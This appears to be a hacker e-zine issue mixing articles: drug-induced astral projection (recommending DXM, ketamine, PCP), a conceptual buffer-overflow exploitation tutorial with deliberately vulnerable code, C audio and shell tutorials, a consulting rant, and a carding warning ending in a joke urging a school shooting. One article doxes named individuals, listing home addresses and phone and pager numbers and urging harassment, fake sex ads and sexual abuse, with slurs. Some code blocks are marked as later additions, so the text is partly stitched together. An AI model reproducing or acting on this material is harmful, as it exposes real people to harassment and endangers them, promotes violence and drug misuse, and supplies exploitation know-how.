You may say "What a huge crock of shit, leaving your body could not possibly be so easy." Yes, this method is fairly simple, but it takes much practice for your average person. It personally took myself several months to start getting anywhere in the experience after I reached the vibrations. But after you get your first OOBE, there are many more to come.
If you want to experience an OOBE possibly your first try, as I said before.. disociatives, like kentamine, pcp help induce them. But most noteably dxm (dextramethorphan). Check out http://www.frognet.net/~dxm for the dxm FAQ, or http://www.alaska.net/~zorak/dxm if you would like the download an issue of the dxm magazine. Conclusion, Hopefully this article gave you a little bit of insight as to what astral projection is all about. If you would like to furthur your knowledge in the area, search for "OOBE", "astral projection" etc. On a search engine. Or go to the library and check out a book on the subject. eg. "Leave your body in 21 days". Also http://www.winternet.com/~rsp/obebook.html is a good book by Robert Peterson on how to have OOBE, and its online in HTML! I hope you enjoyed the article =) ph1x@b4b0.org -------------------------------------------------------------------------------- Womper Language Interpretor, by chrak -------------------------------------------------------------------------------- This is a neat language interepor by chrak, that is still in developement. Check out /w0mper, and make sure to read Example.sh to see a set of example code. * NOTE * this isn't quite finished and hopefully chrak will come through with more releases. Thank you. ---------------------------------------------------------------------------------------- Buffer overflow exploitation, by ph1x ---------------------------------------------------------------------------------------- Buffer overflow exploitation. NOTE: This article does not explain how to write buffer overflows, but rather explains how they are taken advantage of. Ok, there have already been several articles released on buffer overflows and how they are taken advantage of. I talk to people on IRC every day who claim to have skillz, yet beleive it or not many of them do not have the slightest idea as to what a buffer overflow is, how they work, and how they are exploited. 
I'm going to give a brief introduction to them in this article, and I'm hoping that you will have a much better understanding of buffer overflows after going over this. I have a feeling that many people find aleph1's article too complex to understand, so I will try to put the concept of buffer overflows into your head with basic ideas.

 __________________________
|What is a buffer overflow?|

A buffer overflow is just what it sounds like: overflowing a buffer with more data than it can hold. In doing so, you can change the execution of instructions by overwriting the return address on the stack.

The stack is a type of data that is brought up by the ss (stack segment) register when a program is called to be executed. It is what the program's execution is based on. It has several functions, but the two important ones that we need to know are PUSH and POP. PUSH adds data to the top of the stack, like instruction code. POP then removes the last piece of data on the stack, making it smaller.

There is also an important register called the SP register (Stack Pointer), which points to the address of whatever is at the very top of the stack. This actually varies, depending on the processor. For example, on Intel and SPARC, the stack moves in a downward direction towards lower addresses. So the SP points to the top of the stack where new instruction is being placed. On other implementations the stack may move up, so the SP points to the bottom of the stack.

In addition to the stack pointer, there is another register that is commonly referred to as FP (Frame Pointer), which points to a frame on the stack. The distance between the SP (at the top of the stack) and the FP (in one of the stack frames) is used to find the address of local variables and access them. The return address is in charge of executing instruction as the addresses are moved down the stack.

With all of this in mind, let's take a look at a simple example and see how the stack might look.
--------------------------example1.c----------------------------------------
#include <stdio.h>

void integer(int x, int y)
{
    char bleh[10];   /* local buffer, stored in integer()'s stack frame */
}

int main(void)
{
    integer(1, 2);
    return 0;
}
----------------------------------------------------------------------------

The stack would look like this.

      [ bleh ]   [ FP ]   [ RET ]   [ X ]   [ Y ]
 Top of the stack                      Bottom of the stack

How in the hell does all this fit together??? Well, let's look at one more example.

--------------------------example2.c----------------------------------------
#include <string.h>

void overflow_dat_shiat(char *big_string);

int main(void)
{
    char string[100];
    int i;

    for (i = 0; i < 99; i++) {
        string[i] = 'A';
    }
    string[99] = '\0';            /* terminate it, so strcpy() copies 100 bytes */
    overflow_dat_shiat(string);
    return 0;
}

/* deliberately broken: 100 bytes go into a 32 byte buffer */
void overflow_dat_shiat(char *big_string)
{
    char buffer[32];

    strcpy(buffer, big_string);   /* no bounds checking */
}
-----------------------------------------------------------------------------

This code has an error. It uses strcpy(), which supplies no bounds checking, and copies 100 bytes of 'A' chars into a buffer that is only 32 bytes. Therefore, everything on the stack after the 32 byte buffer is being overwritten with A's hex value, which is 0x41. When this program is run, it returns a segmentation violation. Why? Because instead of the next set of instruction for the return address to execute being pushed down to ret (return address), it was mostly all overwritten with the continuous hex value of 0x41. Like 0x41414141. So when it tries executing the set of instruction assigned to 0x41414141 it seg faults.

Understanding this, think what would happen if we could get the return address to execute instructions assigned to a VALID address, maybe an address that holds code. Code that spawns a shell. We could gain root if the program we're overflowing is +s.

To not get very complex, I'm going to finish this article with a clean, easy to understand example as to how we can accomplish doing this. We would want to fill the buffer we are overflowing with code that spawns a root shell, followed by the address of where the buffer we are overflowing starts. Take a look.
'X' stands for the code that executes a shell, and we'll say that "0xF4" is the address of where the buffer begins.

   Buffer    FP    RET
 [XXXXXXXX][XXXX][0xF4]   <--- Filled the buffer and FP with shell instruction
                               followed by the address of where the shell
                               instruction begins.

So RET (return address) is going to execute the instruction that is assigned to 0xF4, which happens to be code that spawns a shell.

Many times we have trouble finding the exact address of where the buffer begins. So we can just fuck with the address a little bit. Of course your chances won't be very good at guessing, but there is something called "padding" that we can do. We fill about half of the buffer with something called NOP instruction. And if the return address executes an address that happens to land anywhere in the NOP instruction, the NOPs will just keep executing until they reach our shell code. For our last example, 'Y' stands for our NOP code and 'X' still stands for shell code. Let's say we don't know that the buffer starts at 0xF4, but we're going to assume that it starts at 0xF6.

   Buffer    FP    RET
 [YYYYYYXX][XXXX][0xF6]   <--- This would land at the second piece of our NOP
                               instruction.

And although we don't have an exact address of where our shell code starts, our NOP instruction is going to execute all the way until it reaches our shell code. The shell code then continues being executed. Then poof!@#$ A shell is spawned.

What happens if the buffer we want to overflow happens to be too small for the shell code to fit in? Well, in most cases you have access to the environment variables on the stack. With this in mind, we can stuff the shell code in one of the variables, and overflow the buffer with the address of the variable holding our shell instruction.

How might I go about auditing source code to find buffer overflow errors? Well, in our example, we used the function strcpy(). But there are several functions that do not do boundary checking.
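For the audit described here, each unbounded call has a replacement that is told how big the destination is. The following is an added example, not part of the original article: the helper names (bounded_copy, bounded_append, bounded_getline) are hypothetical, and example2.c's frame is modelled as a struct with a guard value so that a write past the 32 byte buffer would be visible.

```c
#include <stdio.h>
#include <string.h>

/* strcpy() replacement: dst_size counts the terminating NUL. Input that
 * does not fit is refused, never written past the end of dst. */
int bounded_copy(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (dst_size == 0)
        return -1;
    if (len >= dst_size) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, len + 1);
    return 0;
}

/* strcat() replacement: appends only if the result still fits. */
int bounded_append(char *dst, size_t dst_size, const char *src)
{
    char *end = memchr(dst, '\0', dst_size);
    size_t len = strlen(src);
    if (end == NULL)                       /* dst is not terminated */
        return -1;
    if (len >= dst_size - (size_t)(end - dst))
        return -1;
    memcpy(end, src, len + 1);
    return 0;
}

/* gets() replacement: reads one line, strips the newline, and refuses a
 * line longer than the buffer after discarding the rest of it. */
int bounded_getline(char *dst, size_t dst_size, FILE *fp)
{
    size_t len;
    int c;
    if (dst_size < 2 || fgets(dst, (int)dst_size, fp) == NULL)
        return -1;
    len = strlen(dst);
    if (len > 0 && dst[len - 1] == '\n') {
        dst[len - 1] = '\0';
        return 0;
    }
    c = fgetc(fp);                         /* buffer full: is more coming? */
    if (c == EOF || c == '\n')
        return 0;                          /* no, the line fit exactly */
    while ((c = fgetc(fp)) != EOF && c != '\n')
        ;                                  /* drain the oversized line */
    dst[0] = '\0';
    return -1;
}

/* example2.c's locals as a struct; guard stands in for FP and RET. */
struct frame {
    char buffer[32];
    unsigned int guard;
};

/* Feeds example2.c's 99 'A's to bounded_copy(); returns the guard value. */
unsigned int guard_after_copy(int *status)
{
    struct frame f;
    char string[100];
    memset(string, 'A', 99);
    string[99] = '\0';
    f.guard = 0xB4B0u;
    *status = bounded_copy(f.buffer, sizeof f.buffer, string);
    return f.guard;
}

/* Constructed input: one 40 byte line, then "ls". Returns 0 if the long
 * line is refused and the following line is still read cleanly. */
int getline_demo(char *second, size_t size)
{
    char first[16];
    FILE *fp = tmpfile();
    int r1, r2;
    if (fp == NULL)
        return -2;
    fputs("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\nls\n", fp);
    rewind(fp);
    r1 = bounded_getline(first, sizeof first, fp);
    r2 = bounded_getline(second, size, fp);
    fclose(fp);
    return (r1 == -1 && r2 == 0) ? 0 : -1;
}

int main(void)
{
    int status;
    unsigned int guard = guard_after_copy(&status);
    char line[16] = "";
    int r = getline_demo(line, sizeof line);
    printf("copy status %d, guard %#x\n", status, guard);
    printf("getline demo %d, next line \"%s\"\n", r, line);
    return 0;
}
```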
strcpy(), strcat(), sprintf(), and vsprintf(). gets() is also a problem. Unlike the 4 functions above, which are based on NULL for string termination, gets() reads a line from stdin into a buffer, until a newline or an EOF. Also, a while() loop does not check for character overflows: a loop that fills a buffer with, per se, 'A' a specific number of times. So when auditing source, keep your eye out for these particular functions, and in many cases you will find a buffer overflow error. Good luck =)

Conclusion:

Hopefully after reading this, you have a better understanding as to how buffer overflows work and how they are exploited. If so, you might feel comfortable with reading a more detailed and comprehensive article such as "Smashing the stack for fun and profit" by Aleph. Hope you enjoyed this article.

ph1x@b4b0.org

-------------------------------------------------------------------------------------------
The stupidity that lies in credit fraud, KKR
-------------------------------------------------------------------------------------------

I would first like to start by stating the intent of this article. I have seen far too many of my friends busted for credit card fraud lately. It's probably one of the dumbest things you can do with your computer skills. Sure, it's probably profitable to card tons of hardware and sell it off at half the price and make a bundle. Easy money, right? Well, you won't be laughing when you're in jail and owe thousands of dollars to the government for credit card fraud. Now don't get me wrong, if you really want to get busted then go ahead, this is definitely the way to go. It's probably one of the easiest ways. There is almost a 100% chance that you will be caught and arrested, no matter what type of precautions you take.

If you get caught, arrested and convicted for credit fraud, the consequences can be extremely brutal. No matter what age you are, you will almost definitely be tried as an adult.
If convicted, you will never be able to get any type of goverment job. This doesnt just include the FBI or other high level jobs, but you wouldnt even be able to qualify for a janitor in a public school, or a bus driver on a city bus. "Oh," you say, "Well, im really safe about carding , I use wingates and proxies, and I never order stuff to my house. Theres no way they can catch me." Wrong. The feds have complicated ways of catching carders, and trust me, its very hard not to get caught. First of all, proxy servers and the like can be unsafe. Many times they log all connections, so the federal agencies have only to call the owners of the machine, and request the logs for a certain time. A request which they will most usually comply with. Ever hear of the kids who broke into the pentagon? They used all sorts of proxies and shit, and what happened to them? They got their asses caught. Drop email addresses for reply emails from the company you're carding from can get you caught as well. Places like hotmail and yahoo usually log the host you're using to get your mail, so that's not safe either. You like bragging about your carding on IRC? Federal agents frequent irc carding channels so I'd stay away from them. You think its safe to card stuff to an empty house? Federal agents can place a small packet of material that can easily be tracked by trained dogs in the package if they are investigating you for carding, so if you bring the merchendise home, your screwed. If you're carding now, stop. If you're thinking about doing it, think again. I have a much better and more rewarding idea. Bring a shotgun to school and blast a few teachers, you have a pretty good chance of getting away with it. 
Kaptain Kangaroo

----------------------------------------------------------------------------------------
Screwing around with /dev/audio, by ph1x
----------------------------------------------------------------------------------------

In unix, all of your devices are referred to as "special files". I have heard several people asking about /dev/audio, and how to access it and take advantage of it etc. I decided to write an article on it. Below are some functions that I wrote that you can use to read and write from /dev/audio. Enjoy =)

-------------------------------funct10nZ-------------------------------------
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>

#define DEVICE "/dev/audio" /*duh*/

int fd = -1; /* this is our audio device file descriptor */

/* this opens /dev/audio, retrying if the call is interrupted */
int open_sound(void)
{
    while (((fd = open(DEVICE, O_RDWR)) == -1) && (errno == EINTR))
        ;
    if (fd < 0)
        return -1;
    return 0;
}

void close_sound(void) /* this closes /dev/audio */
{
    close(fd);
    fd = -1;
}

/* this reads up to maxb bytes from /dev/audio */
int read_sound(char *buff, int maxb)
{
    ssize_t bytes;

    while (((bytes = read(fd, buff, (size_t)maxb)) == -1) && (errno == EINTR))
        ;
    return (int)bytes;
}

/* this writes size bytes to /dev/audio, restarting short or interrupted writes */
int write_sound(char *buffer, int size)
{
    ssize_t written = 0; // bytes written
    size_t tried;        // bytes tried
    char *buffl;

    buffl = buffer;
    tried = size;
    while (tried != 0) {
        if ((written = write(fd, buffl, tried)) >= 0) {
            tried -= written;
            buffl += written;
        } else if (errno != EINTR)
            break;
    }
    if (written == -1)
        return -1;
    else
        return size;
}
-------------------------------------------------------------------------------

So the following function prototypes should be in like bleh.h, like so..

int open_sound(void);
void close_sound(void);
int read_sound(char *buff, int maxb);
int write_sound(char *buffer, int size);
-----------------------------------------

Let's write a little proggy that reads from the microphone now.
--------------------------------microphone.c------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/types.h>
#include "bleh.h"

#define BUF 1024

int main(void)
{
    char buffer[BUF];
    int nread;   /* bytes read; not called "read" so read(2) is not shadowed */

    if (open_sound() == -1) {
        fprintf(stderr, "Could not open /dev/audio\n");
        exit(1);
    }
    printf("Speak into your microphone now, HEH!@#$\n");
    while (1) {
        if ((nread = read_sound(buffer, BUF)) == -1) {
            fprintf(stderr, "Could not read microphone\n");
            break;
        } else if (write_sound(buffer, nread) == -1) {
            fprintf(stderr, "Could not write to speakers\n");
            break;
        }
    }
    close_sound();
    exit(0);
}
----------------------------------------------------------------------------------------

Pretty cool huh? We had a chance to use all of my functions in this program. Unfortunately I didn't have a lot of time to extend any further on this article. Sorry. Enjoy =)

ph1x@b4b0.org

----------------------------------------------------------------------------------------
My day in age, by rhinestone cowboy
----------------------------------------------------------------------------------------

I had an epiphany the other day. It wasn't the kind of flash of insight that makes you shave your head, move to the desert, and change your name to something that sounds like an astronomical phenomena, but I do think it's something that other people need to hear. You see, I am a professional consultant, and with this project, I became a man.

I was tasked with building a firewall for a healthcare facility. This wasn't very difficult, and, apart from the planning phases and a lot of mostly useless meetings, it got built in a day or two. All the exceptions were put in place, and the LAN was protected to a degree to which it had never been protected before. All was right with the world...

... Until the client got involved. It started with a simple request. "Could you please open up telnet services in the firewall to this one particular Solaris box? We have a few outside consultants who need to get into that box so they can work remotely.
In particular, we have a user from an educational facility who needs remote root access." I objected, of course, but I was then informed that it was the opinion of the IS staff, that this was an "acceptable risk." This wasn't an opinion that could be justified by anyone, especially after they shelled out countless thousands of dollars on a "network security solution". It got a little worse, of course. About a week later, I uncovered a bug in there web front end to their database. Instead of praise, I got what I should have expected, exchanges like the following: "Only people who subscribe to this database should have access. Now you are telling me that ANYONE on the net can get this data for free? What the hell is that firewall doing?" "The firewall is doing it's job. The problem is that your web app. Never asked me for anything like a password. It just gave me access. It really wasn't complicated at all. A fireall simply cannot fix your buggy software. "Firewalls make computers secure. This computer isn't secure. Obviously, the fireall you made, doesnt work." He just didn't get it. I would have been more then happy to spend the time to audit all the machines individually, apply the proper patches, and fix any configuration errors that may rear their ugly heads, if the client was willing to pay for my time. Hell, i'd even work hard! Unfortunatley, the client didn't want to hear that. He wanted his "magic bullet, " and if I wasnt willing to provide it, he'd hire another consulting company to do it. It then occurred to me, that this senario is being played out all over the net, and it's alot bigger then I had previously realized. I was playing a part, so was the IS director, so was my company, and so was the firewall. Corporate America is all about "covering your ass." No one wants accountability for anything. If bullshit and 'passing the buck' were the keys to world domination, the USA would be the world's only super power. Wait, never mind... 
Anyway, this is what hit me. Firewalls do alot more then filter packets and give IS gimps a warm fuzzy feeling when they go home at night. Firewalls manage to almost universally remove any traces of accountability in corporate security. As in the above example, if, I mean when, someone sniffs the root password and usese it to compromise the LAN, the IS depart- ment can pretend that they weren't at fault. They can pass the buck to me or my company. Fortunatley, there is a contract protecting us from lawsuits of that nature. If necessary, the buck can even be passed, either by my company or the clients, to the vendor. Even they can pass the buck, since any rational person would realize that they weren't involved in this morass. The myth of the "fireawall as a magic bullet" is some of the most useful bullshit ever spun. It allows everyone to sleep easier at night and make alot of money. Of course, the buck ultimately stops getting passed by another piece of bullshit, the myth of "the genius hacker." I'm not saying that there aren't some genuinely brilliant people breaking into computers these days, but chances are they aren't relying on a 5 year old sniffer running on a SunOS 4.1.3 box in an .edu site, which is silly enough to have a guessable NIS mapname. The world is very broken. We have security products that either simply don't work, don't work up to the impossible expectations put on them , or even introduce furthur holes in hosts and networks they are suppose to be protecting. We also have a world of corperate IS managers, mostly incompetent "security consultants", and talentless bullshit artists who manage to social engineer their way into six figure incomes because they are "reformed hackers." It would be nice if some kind of messiah of the computer age were to come along and make it all better. Unfortunately, that's not going to happen. 
If there was such a person, we'd either nail him to a cross or he would opt for the huge paycheck which comes with playing a part in the system. I suspect I have finally entered into adult life, because I have little or no desire to change an awfuld system that I can not fix. There are quite a bit of rewards for being as corrupt as everyone else. So here is the choice facing us all, either sit down at the table of corruption and shared guilt and get paid alot (basically sell out) or fight a hopeless battle against American corporate culture. I think adulthood is really choosing to play in the "bullshit playground" with the rest of the grownups. Today, I am a man. Rhinestone Cowboy -------------------------------------------------------------------------------- d0x (For your harrasing enjoyment) by pG -------------------------------------------------------------------------------- hey kids! it's yer friendly neighborhood nazi death metal anarchist, racist, fucked up, mentally disturbed, cracked up, dopehead, abortion supportin, nigger lovin, grave desecrating, dj sporting, rave killing, teacher hating, school burning, car alarm setting, payphone breaking, road sign tagging, unethical hacking motherfucker, plastik gezus. and guess what i got for you people today...that's right people, i've got a fresh little hax0r kiddie. you all know them, and love to fuck with them. and since i seem to be like a lamer magnet since my name gets posted on every "leet-0 hax0r" site on the internet, i thought i'd share this one special kid with you. the first thing a pipe-dream hacker needs is a leet handle, as for this kid, his name is "datasyn." oh wait i'm sorry... "dAtasYn." my bad... however, that's obviously not his real name. for the sake of this article we're going to call him... oh.... Mike Feltenberger. now you may ask yourself what the point of having a el8 hax0r of your own is. well.. these people can be very fun. 
for example: say you're bored and you and your friends are sitting around thinking of something to do. you've got a phone. well, you could prank call him. all you would need is a number, like.. say.. 724/588-8963 or maybe 724/588-9138. now you're set! see how much fun that is? or you could shut off his phones all together, all you need is an address (like 80 Clarksville Street; Greenville, PA) and a tiny bit of skill and you're all set, my friend. now i know what you're saying: "sure this is fun for a few months, but what happens when i get bored with making his life crap?" well, then you can move on to his friends. losers always have some homosexual friends. in this case it would be a little hax0r group called the Hax0rz MatrickZ. but you say, "well i'm really lame, and i can't get d0x as elite as you pG, will you help me?" why of course, friend! the owner of this wonderfuly leet-0 hax0r gr0up is none other than the never-heard-of-before-because-has-never-done-anything nEoGoD. let's call him... say... Josh Hanselman. "but pG, what do i do with just his name?" easy, let's pretend you didn't have enough skill to get his phone number (which is 724/646-1599 btw). you could still get his address using directory services and post sex ads on yahoo.com. hours of family fun! "ok pG, but can't i make random calls to other people he knows and start talking shit about him?" why of course! now you're thinkin.. you could get the numbers of his friends too if you were el8 enough. (like say.. 724/646-0465, 724/475-2294, and 724/253-2750) see how much fun this is? "yeah it is, but what about his girlfriends?" oh that's easy, Erin.. i mean, whoever it may be, can be called and harassed just as well. like say her phone number was 724/588-0817, you could call up and say "hey Erin (or whatever her name is), you sissy cunt, are you ready for my dick bitch?" "what happens when 5000 people start calling them?" 
well, let's say your victim was called vyle-t0ne (724/342-2768) and he thought he was a leet hax0r, well he would quickly be put in his place and probably leave the internet in fear.well that's all for now kids. have fun. and yes, this WAS boring to write just as it was boring to read. so fuck off kid! my ass is bleeding, bye. Your friend, Plastic Gezus *************[BONUS DOX!@#$]************ Coolio: Joseph fillmore 1314 Comstock St. San Diego, CA 92111 Phone: 619-268-8330 ----------------------------------- overdose aka Shawn : 517-262-2199 1-800-800-8689, pin # 80008310 54 (alpha op dispatch) 313-238-2660 (numeric/voicemail) --------------------------------------------------------- Digitalx: (604)951-1191 ***************************************** PS. Dox dropping is lame, but for these 3 gimps, we made an special exception. -------------------------------------------------------------------------------- Coding a shell from the ground up, ph1x -------------------------------------------------------------------------------- This article I am going to discuss what a shell is, how a shell works and were going to build a shell from the ground up. For all source were going to be writing today, we will need b4b0shell.h included below. Lets get started. A shell is a program that does command interpretation. A shell can also be reffered to as a command processor, as most DOS users know. It reads input, then executes the command. The execution of a command, is basically creating a child process for the execution. For example, the shell will fork() a child process to execute the command. The parent(the shell) will then wait for its child to finish before it reads another command. Before we start coding, make sure your using the following header file in all of your codez.. /**********************************/ /* Header file for the b4b0 shell */ /* Extrapolated from ush.h, and */ /* added onto. 
ph1x@b4b0.org */
/**********************************/

/* NOTE: We won't be making use of this whole header file today.
   Our shell is not going to have the complexity of your standard
   unix shell that you use from a daily to daily basis. */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <limits.h>
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/wait.h>

#define STDMODE 0600
#define DELIMITERSET " ><|&"   // we are only going to add redirection to
                               // our shell, not background or pipe support
#ifndef MAX_CANON
#define MAX_CANON 256
#endif
#define TRUE 1
#define FALSE 0
#define BLANK_STRING " "
#define PROMPT_STRING "b4b0$"
#define QUIT_STRING "quit"
#define BACK_STRING "&"            // for background process
#define PIPE_STRING "|"            // pipe support
#define NEWLINE_STRING "\n"
#define IN_REDIRECT_SYMBOL '<'     // redirection
#define OUT_REDIRECT_SYMBOL '>'    // symbols
#define NULL_SYMBOL '\0'
#define PIPE_SYMBOL '|'
#define BACK_SYMBOL '&'
#define NEWLINE_SYMBOL '\n'

int makeargv(char *s, char *delimiters, char ***argvp);
int parsefile(char *inbuf, char delimiter, char **v);   // this will return the token following
                                                        // delimiter if it's present in *s.
int redirect(char *infilename, char *outfilename);      // performs redirection
int connectpipeline(char *cmd, int frontfd[], int backfd[]);

/*************************-=EOF=-******************************/

First we will write an extremely basic command interpreter, just for you to get a basic idea as to how a shell calls a child process to execute commands, and for you to experiment with.
---------------------------bsh v1.0-----------------------------------
#include "b4b0shell.h"

#define MAX_BUF 500

int main(void)
{
    char input[MAX_BUF];
    char **rargv;

    while (1) {
        fprintf(stderr, "%s\n", PROMPT_STRING);
        fgets(input, MAX_BUF, stdin);
        input[strcspn(input, "\n")] = '\0';   /* drop the newline fgets() keeps */
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if (fork() == 0) {
                /* child: no check on execvp() failing, see below */
                if (makeargv(input, BLANK_STRING, &rargv) > 0)
                    execvp(rargv[0], rargv);
            }
            wait(NULL);
        }
    }
    exit(0);
}
--------------------------------EOF-----------------------------------------

Pretty simple huh? When you run it, go ahead and execute some basic programs, like ls, grep, find etc. It works! Now, as I said before, this is a very raw, basic shell, and does not support wildcards like '*' or '?'. Also, it doesn't support certain commands like 'cd', which is available in any good shell.

If by some chance the wait() isn't called? Well, not too much of a problem, but if a user enters a command before the previous one has finished executing, the commands will execute concurrently (read my article on concurrency). Also, due to the fact that this first version we wrote does not find errors on the execvp() call, it gets fucked up if you enter an invalid command. Your shell won't get control back from the child process, and the child process creates its OWN shell. So you have to type 'quit' to get back to your parent shell.

Let's write a better version of this shell that handles errors with execvp(), and we will also replace the #define'd MAX_BUF with MAX_CANON (located in b4b0shell.h), because MAX_BUF is nonportable.
----------------------------bsh v2.0-------------------------------------
#include "b4b0shell.h"

/* runs in the child; never returns to the caller */
void execthecommand(char *incmd)
{
    char **rargv;

    if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1) {
            printf("Invalid command\n");
            exit(1);
        }
    }
    exit(1);
}

int main(void)
{
    char input[MAX_CANON];
    pid_t child_pid;

    while (1) {
        fputs(PROMPT_STRING, stdout);
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline */
        if (*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            } else if (child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF-----------------------------------------

We made several changes to version 2 of our shell. Notice we used fputs() instead of fprintf() for the command line. fputs() prints a defined string a lot faster. Also, notice we did some more error checking in this version. Also notice we now have the function execthecommand() to replace the original execvp() and makeargv() calls. Control will never come back from the function execthecommand(), so you shouldn't be having a problem when you enter invalid commands.

Unix deals with input/output through file descriptors. A program has to open a file or a device before it can access it. It will then access the file using a handle that is returned by the open() syscall. With the support of redirection, you can do stuff like this.

b4b0$ cat < input.txt > output.txt

That command redirects its standard input to 'input.txt' and its output to 'output.txt'. The following is a revised version of the execthecommand() function that you can use to support redirection. I basically made execthecommand() parse *incmd, which might give possible redirection. It then calls redirect() to perform the actual redirection, and makeargv() to create the command array. It then execs the command.
-----------------------------execthecommand() v2.0 by ph1x--------------------
#include "b4b0shell.h"

void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;

    if (parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if (redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}
--------------------------EOF---------------------------------------------

Change the execthecommand() in bsh v2.0 to the one I modified for redirection support. Let's take a look at our final shell.

--------------------------bsh v3.0--------------------------------------
#include "b4b0shell.h"

/* runs in the child: set up redirection, then exec the command */
void execthecommand(char *incmd)
{
    char **rargv;
    char *infile;
    char *outfile;

    if (parsefile(incmd, IN_REDIRECT_SYMBOL, &infile) == -1)
        printf("Incorrect input redirection\n");
    else if (parsefile(incmd, OUT_REDIRECT_SYMBOL, &outfile) == -1)
        printf("Incorrect output redirection\n");
    else if (redirect(infile, outfile) == -1)
        printf("redirection failed!@#$\n");
    else if (makeargv(incmd, BLANK_STRING, &rargv) > 0) {
        if (execvp(rargv[0], rargv) == -1)
            printf("Invalid command\n");
    }
    exit(1);
}

int main(void)
{
    char input[MAX_CANON];
    pid_t child_pid;

    while (1) {
        fputs(PROMPT_STRING, stdout);
        if (fgets(input, MAX_CANON, stdin) == NULL)
            break;
        /* strip the trailing newline */
        if (*(input + strlen(input) - 1) == NEWLINE_SYMBOL)
            *(input + strlen(input) - 1) = 0;
        if (strcmp(input, QUIT_STRING) == 0)
            break;
        else {
            if ((child_pid = fork()) == 0) {
                execthecommand(input);
                exit(1);
            } else if (child_pid > 0)
                wait(NULL);
        }
    }
    exit(0);
}
------------------------------EOF--------------------------------------

Redirection is the last feature we are going to put in our shell.
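An added, self-contained version of the fork/exec/wait loop with redirection, not ph1x's code: makeargv(), parsefile() and redirect() are not shown in the article, so hypothetical stand-ins (parse_command, redirect_fds, run_line) take their place, and redirection symbols must be separated by blanks. The child calls _exit() when redirection or execvp() fails, which is what stops a failed command from leaving a second copy of the shell running, the bsh v1.0 problem.

```c
#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/wait.h>

#define MAX_ARGS 64
#define STDMODE  0600            /* as in b4b0shell.h: owner-only output files */

struct command {                 /* hypothetical; replaces makeargv()/parsefile() output */
    char *argv[MAX_ARGS];
    char *infile;                /* name after '<', or NULL */
    char *outfile;               /* name after '>', or NULL */
};

/* Splits line in place on blanks. Returns argc, or -1 if a redirection
 * symbol has no file name after it or there are too many arguments. */
int parse_command(char *line, struct command *cmd)
{
    int argc = 0;
    char *tok;

    cmd->infile = cmd->outfile = NULL;
    for (tok = strtok(line, " \t\n"); tok != NULL; tok = strtok(NULL, " \t\n")) {
        if (strcmp(tok, "<") == 0 || strcmp(tok, ">") == 0) {
            char *name = strtok(NULL, " \t\n");
            if (name == NULL)
                return -1;
            if (tok[0] == '<')
                cmd->infile = name;
            else
                cmd->outfile = name;
        } else if (argc < MAX_ARGS - 1) {
            cmd->argv[argc++] = tok;
        } else {
            return -1;
        }
    }
    cmd->argv[argc] = NULL;
    return argc;
}

/* Child side only: points stdin/stdout at the named files. */
static int redirect_fds(const struct command *cmd)
{
    int fd;

    if (cmd->infile != NULL) {
        if ((fd = open(cmd->infile, O_RDONLY)) == -1)
            return -1;
        if (dup2(fd, STDIN_FILENO) == -1)
            return -1;
        close(fd);
    }
    if (cmd->outfile != NULL) {
        if ((fd = open(cmd->outfile, O_WRONLY | O_CREAT | O_TRUNC, STDMODE)) == -1)
            return -1;
        if (dup2(fd, STDOUT_FILENO) == -1)
            return -1;
        close(fd);
    }
    return 0;
}

/* Runs one command line and waits for it. Returns the command's exit
 * status, 126 if redirection failed, 127 if it could not be executed,
 * or -1 on a parse, fork or wait error. */
int run_line(const char *line)
{
    char buf[256];
    struct command cmd;
    pid_t pid;
    int status;

    if (strlen(line) >= sizeof buf)
        return -1;
    memcpy(buf, line, strlen(line) + 1);
    if (parse_command(buf, &cmd) <= 0)
        return -1;
    fflush(NULL);                          /* no buffered output duplicated by fork() */
    if ((pid = fork()) == -1)
        return -1;
    if (pid == 0) {
        if (redirect_fds(&cmd) == -1)
            _exit(126);
        execvp(cmd.argv[0], cmd.argv);
        _exit(127);                        /* exec failed: die here, never return */
    }
    while (waitpid(pid, &status, 0) == -1)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char input[256];

    while (fputs("b4b0$ ", stdout), fflush(stdout), fgets(input, sizeof input, stdin)) {
        input[strcspn(input, "\n")] = '\0';
        if (strcmp(input, "quit") == 0)
            break;
        if (input[0] != '\0' && run_line(input) == 127)
            fprintf(stderr, "Invalid command\n");
    }
    return 0;
}
```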
Unfortunately, I was busy as hell getting b4b0 7 together, and I didn't have much time to add support for pipes, background processes, job control (which allows a user to move the foreground process group into the background, and vice versa), or most of the other things that a good shell features. This was merely for your learning and enjoyment. Hope you gained something out of it. Feel free to look up the functions in b4b0shell.h that we didn't use, and extend your shell with them. Bye. HEH!@#$

ph1x@b4b0.org

-------------------------------------------------------------------------------------
The art of making shell code, by smiler.
-------------------------------------------------------------------------------------

